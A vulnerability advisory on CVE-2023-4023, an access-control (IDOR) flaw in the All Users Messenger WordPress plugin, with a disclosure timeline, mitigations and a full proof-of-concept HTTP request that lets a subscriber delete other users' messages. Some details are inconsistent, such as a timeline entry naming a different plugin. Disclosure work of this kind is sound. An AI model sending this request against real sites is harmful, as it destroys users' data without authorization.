In a recent round of intensive plugin testing, a concerning security flaw has come to light. The All Users Messenger plugin, a widely used communication tool for WordPress, harbors a significant Insecure Direct Object Reference (IDOR) vulnerability.
Main info:
| CVE | CVE-2023-4023 |
| Plugin | All Users Messenger |
| Critical | Medium |
| Publicly Published | August 7, 2023 |
| Last Updated | August 7, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A5: Broken Access Control |
| PoC | Yes |
| Exploit | Will be later |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4023 https://wpscan.com/vulnerability/682c0226-28bd-4051-830d-8b679626213d |
| Plugin Security Certification by CleanTalk |  |
Timeline
| July 25, 2023 | Plugin testing and vulnerability detection in the Simple Blog Card plugin have been completed |
| July 25, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 26, 2023 | The author closed his plugin and did not fix the vulnerability |
| August 7, 2023 | Registered CVE-2023-4023 |
Discovery of the Vulnerability
During a meticulous examination of the All Users Messenger plugin for WordPress, an internal vulnerability was unearthed, specifically affecting versions up to 1.24. The vulnerability involves a significant oversight that permits non-administrator users to delete messages from the all-users messenger, potentially leading to unauthorized data manipulation.
Understanding of IDOR (Insecure Direct Object Reference)
Insecure Direct Object Reference (IDOR) is a security vulnerability that arises when an application does not sufficiently verify user access rights before allowing access to certain resources or functionalities. In the case of the All Users Messenger plugin, the absence of proper access checks enables unauthorized users to delete messages that they should not have permission to manipulate.
Exploiting the IDOR (Insecure Direct Object Reference) vulnerability
By leveraging the lack of adequate access control, a non-administrator user with subscriber-level privileges can manipulate the plugin’s message deletion functionality to remove messages that belong to other users. This can potentially disrupt communication, lead to data loss, and compromise the integrity of the messaging system.
POC request:
POST /wordpress/index.php?rest_route=%2Frf%2Fall_users_messenger_view_api%2Ftoken&_locale=user HTTP/1.1
Host: your_host
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, /;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_host/wordpress/wp-admin/admin.php?page=AllUsersMessenger
X-WP-Nonce: 5e42638171
Content-Type: application/json
Origin: http://your_host
Content-Length: 81
Connection: close
Cookie: cookie of low privilege user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin{“userid”:1,”delete”:{“1690260984”:true,”1691465801″:true},”submit_delete”:true}
This shortcode can be inserted into a new post
Potential Risks and Real-World Impact
A subscriber-level user is able to exploit this vulnerability by tampering with message deletion requests, allowing them to delete messages from the all-users messenger that they should not have the authority to modify.
- Unauthorized Data Manipulation:
Attackers could maliciously delete important messages, leading to information loss and potential disruption of communication among users. - Privacy Breach:
Sensitive or private messages could be deleted by unauthorized users, potentially violating user privacy and confidentiality. - Content Tampering:
By exploiting the vulnerability, attackers might alter or delete critical messages, affecting the authenticity and reliability of communication.
Recommendations for Improved Security
To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:
- Immediate Plugin Delete:
Website administrators should delete the All Users Messenger - Access Control Validation:
Developers should conduct rigorous access control checks to ensure that users have the appropriate authorization before allowing them to modify or delete messages. - Regular Security Audits:
Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively. - User Privilege Restriction:
Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions. - Least Privilege Principle:
Implement the principle of least privilege, granting users only the permissions necessary for their intended tasks.
By addressing the IDOR vulnerability in the All Users Messenger plugin and adopting these security recommendations, website owners can fortify their messaging systems, preserve data integrity, and create a safer environment for communication among users.
Use CleanTalk solutions to improve the security of your website
Dmitrii i.
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
Related posts
